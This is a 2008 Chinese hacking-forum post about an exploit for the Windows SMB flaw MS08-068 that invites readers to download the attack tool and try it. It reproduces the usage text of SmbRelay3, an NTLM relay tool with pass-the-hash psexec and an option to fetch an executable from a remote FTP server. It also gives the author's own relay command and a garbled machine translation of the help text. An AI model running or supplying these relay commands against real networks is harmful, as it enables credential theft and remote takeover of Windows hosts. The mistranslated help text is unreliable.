|
楼主 |
发表于 2008-11-16 02:03:32
|
显示全部楼层
|阅读模式
来自 上海市浦东新区
http://www.microsoft.com/china/t ... letin/MS08-069.mspx
ms08-068 EXP利用方法测试公布有附溢出程序和图片
大家好,我是深蓝
这两天从http://www.milw0rm.com/exploits/7125 这里拿到了所谓的 ms08***68 的利用EXP
测试了一下,里面有两个EXe文件
看图片
其中smbrelay3.exe 应该就是溢出的工具,
看它的说明
原文:
SmbRelay3 - NTLM Authentication replay attacks
(c) 2007 - 2008 Andres & Miguel Tarasco
Web Site - http://www.tarasco.org
Usage: SMBRelay3.exe <binding> [options]
Binding Parameters:
--ListForSMBRequests (Wait for incomming connections against port 445)
--ListForHTTPRequests(Wait for incomming connections against port 80)
--ListForSMTPRequests(Wait for incomming connections against port 25)
--ListForIMAPRequests(Wait for incomming connections against port 143)
--ListForPOP3Requests(Wait for incomming connections against port 110)
--psexec <host> <username> <password>(psexec like tool)
--psexec <host> <username> <:NTLMHash> (psexec like tool)
Optional Parameters
--AlternativeSrcPort <port>(Listen under different Port)
--AlternativeDstPort <port>(Connect to a different SMB Port)
--SMBDestinationHost <host>(Replay attack against third part host)
--SrcHostname<host>(Spoof incoming client name for Win2k (default smbrelay)
--ftp <hostname> <port> <user> <pass> (download smrs.exe from remote ftp server)
--v[v] (Displays verbose information )
Example: smrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 8080 --SMBDestinationHost dc.mydomain.com
用google翻译了一下:
SmbRelay3 -验证重放攻击
(三) 2007 -2 008安德烈斯&米格尔塔拉斯科
网站-h ttp://www.tarasco.org
用法: SMBRelay3.exe <binding> [选项]
结合参数:
-L istForSMBRequests(等待连接i ncomming对端口4 45)
-L istForHTTPRequests(等待连接i ncomming对端口8 0)
-L istForSMTPRequests(等待连接i ncomming对端口2 5)
-L istForIMAPRequests(等待对i ncomming连接端口1 43)
-L istForPOP3Requests(等待连接i ncomming对端口1 10)
-p sexec<主机> <用户名> < password>( p sexec像工具)
-p sexec<主机> <用户名> “ : N TLMHash” ( p sexec像工具)
可选参数
-A lternativeSrcPort< port>其中(听根据不同港口)
-A lternativeDstPort< port>其中(连接到不同的中小企业港)
-S MBDestinationHost<主机> (重播攻击主机第三部分)
-S rcHostname<主机> (欺骗性传入客户端的名称W in2k(默认s mbrelay)
-< hostname>< port>其中的F TP< user>< pass>(下载s mrs.exe从远程f tp服务器)
-五[五] (显示详细资料)
例如: smrelay3.exe -L istForHTTPRequests- Al ternativeSrcPort80 80-S MB DestinationHostdc. mydomain.com
经测试:可以用这样的命令得到一个监听的808端口:
smrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 808 --SMBDestinationHost 127.0.0.1
808改为你要监听的端口,它是自动监听的,
127.0.0.1 应该是要溢出的IP
但是没有测试成功过,大家去试试吧,说不这下有可以成功的
这里又工具我没说明不好意思!大家随便下居然有人卖太不人道了!!
今天把新漏洞的教程补上!大家一起研究下!!点击下载 |
|